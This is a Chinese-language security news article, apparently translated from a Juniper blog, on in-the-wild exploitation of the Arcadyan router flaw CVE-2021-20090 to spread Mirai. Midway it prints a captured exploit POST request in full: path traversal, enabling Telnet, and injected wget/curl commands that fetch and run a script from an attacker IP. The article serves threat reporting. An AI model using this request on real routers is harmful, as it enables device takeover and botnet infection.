研究人员发现9.9分漏洞在野利用，数百万路由器设备受到影响。

CVE-2021-20090漏洞

CVE-2021-20090漏洞是Tenable研究人员8月3日公开的包含Arcadyan固件的路由器web接口路径遍历漏洞，CVSS评分9.9分。漏洞影响数百万家用路由器设备和其他使用有漏洞的代码库的物联网设备，包括部分互联网服务提供商在内的不少于17家厂商的产品受到影响。

CVE-2021-20090漏洞是一个路径遍历漏洞，可能引发认证绕过。成功利用该漏洞后，攻击者可以完全接管有漏洞的设备。比如，Tenable研究人员已经证明了如何在有漏洞的路由器上修改配置以启用Telnet，并获取访问设备的root级shell访问权限。

cve-2021-20090漏洞的技术细节参见：

https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2

在野漏洞利用

Juniper安全研究人员在监控一起恶意网络活动流量时发现尝试利用该漏洞的攻击模式。攻击者看似尝试在受影响的路由器上使用脚本的方式来部署Mirai恶意软件变种。

研究人员从今年2月18日开始监控到该攻击活动，原始的攻击来源与IP地址27.22.80[.]19，通过HTTP POST方法：

POST /images/..%2fapply_abstract.cgi HTTP/1.1 
Connection: close 
User-Agent: Dark 
action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;
wget+http://212.192.241.72/lolol.sh;
curl+-O+http://212.192.241.72/lolol.sh;
chmod+777+lolol.sh;
sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

从该POST 请求中可以看出，攻击者修改了被攻击设备的配置信息使用“ARC_SYS_TelnetdEnable=1”来启用Telnet，然后使用wget或curl从IP 地址212.192.241[.]72 处下载一个新的脚本，然后执行。研究人员分析该脚本payload并确认是Mirai僵尸网络变种。

从6月6日到7月23日，研究人员发现攻击者开始利用其它的漏洞：

◼CVE-2020-29557 (DLink路由器)

◼CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)

◼CVE-2021-31755  (Tenda AC11)

◼CVE-2021-22502 (MicroFocus OBR)

◼CVE-2021-22506 (MicroFocus AM)

这表明该攻击组织正通过添加新的漏洞利用不断扩展其攻击活动。

本文翻译自：https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild如若转载，请注明原文地址